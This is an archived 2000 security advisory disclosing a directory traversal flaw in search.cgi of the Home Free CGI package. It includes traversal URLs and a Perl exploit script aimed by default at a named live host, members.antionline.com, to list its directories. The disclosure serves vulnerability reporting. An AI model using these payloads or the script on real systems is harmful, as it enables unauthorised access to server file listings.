==============================================================================
#!/bin/csh security advisory
----------------------------
Title : Vulnerabilities in the SolutionScripts.com
Home Free CGI package.
Advisory Ref : csh-adv:04.01.2000-CGI-HomeFree-01
Credits : fzx, omnihil, the guys in !el8
DSKZ, M0D
==============================================================================
Introduction
------------
SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by SolutionScripts.com, below is an extract
from their website.
"Home Free is the ultimate community building program. Allowing you
to give your visitors a free web site on your server. With complete
control over every aspect of your free web site program, you can
grow page views, revenue and brand awareness for your site."
http://solutionscripts.com/vault/homefree/index.shtml
Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.
Details
-------
Home Free consists of the following files from an end-user point of view :-
./features.cgi
./new.cgi
./search.cgi
./signup.cgi
./user_files.cgi
./user_formmail.cgi
./user_ftp_import.cgi
./user_gbook.cgi
./user_manage.cgi
./user_pref.cgi
./user_uploads.cgi
./user_wwwboard.cgi
There are also various 'admin' CGI scripts in the package, such as :-
./admin.cgi
./admin_browse.cgi
./admin_cata.cgi
./admin_email.cgi
./admin_features.cgi
./admin_setup.cgi
./admin_update.cgi
Vulnerabilities Identified
--------------------------
./search.cgi
The search.cgi script uses the following input variables :-
letter=any string
cata=any string
perpage=any string
start=any string
boolean=or/and
advanced
This CGI script can be exploited to view directory listings on the host
server. A vulnerability exists because of insufficient bounds checking
of the 'letter' variable when it is parsed by the search.cgi script,
for example :-
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt
The above URL will list the \winnt directory of the host. The
search.cgi
script also seems to read and display the first line of each file
(network.wri, et al). We have been unable to use the search.cgi script
or any of the other scripts in the package to view files to date.
If we had access to the source code of these Perl scripts, I'm sure
that
many security problems would be identified.
You can also exploit the vulnerability to view other directory
listings,
such as the /cgi-bin directory under Apache.
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin
We also took the time in writing a short Perl script to display the
directory listings of vulnerable servers :
--8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to
list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#
use IO::Socket;
if ($ARGV[0] eq "") { die "no argument\n"; }
$asoc = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "members.antionline.com",
PeerPort => 80) ||
die "can't connect to host: $!";
select($asoc);
$| = 1;
print $asoc "GET
/cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all
HTTP/1.0\n\n";
while(<$asoc>) {
if ($_ =~ /.+HREF.+TD.+/) {
@parts = split("\"", $_);
$foo = $parts[1];
@parts = split("/", $foo);
print STDOUT $parts[3];
print STDOUT "\n";
}
}
close(ASOC);
--8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
Other smaller problems were identified when testing the bounds checking
and
flexibility of the other scripts, such as user_manage.cgi. Without access
to
the source code of the Perl scripts in question, it is very difficult to
know the security implications of such problems. We'll leave that up to
the vendor to look into and patch.
==============================================================================
#!/bin/csh security advisory
----------------------------
Title : Vulnerabilities in the SolutionScripts.com
Home Free CGI package.
Advisory Ref : csh-adv:01.04.2000-CGI-HomeFree-01
Credits : fzx, omnihil, the guys in !el8
DSKZ, M0D
==============================================================================
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:25:47 PDT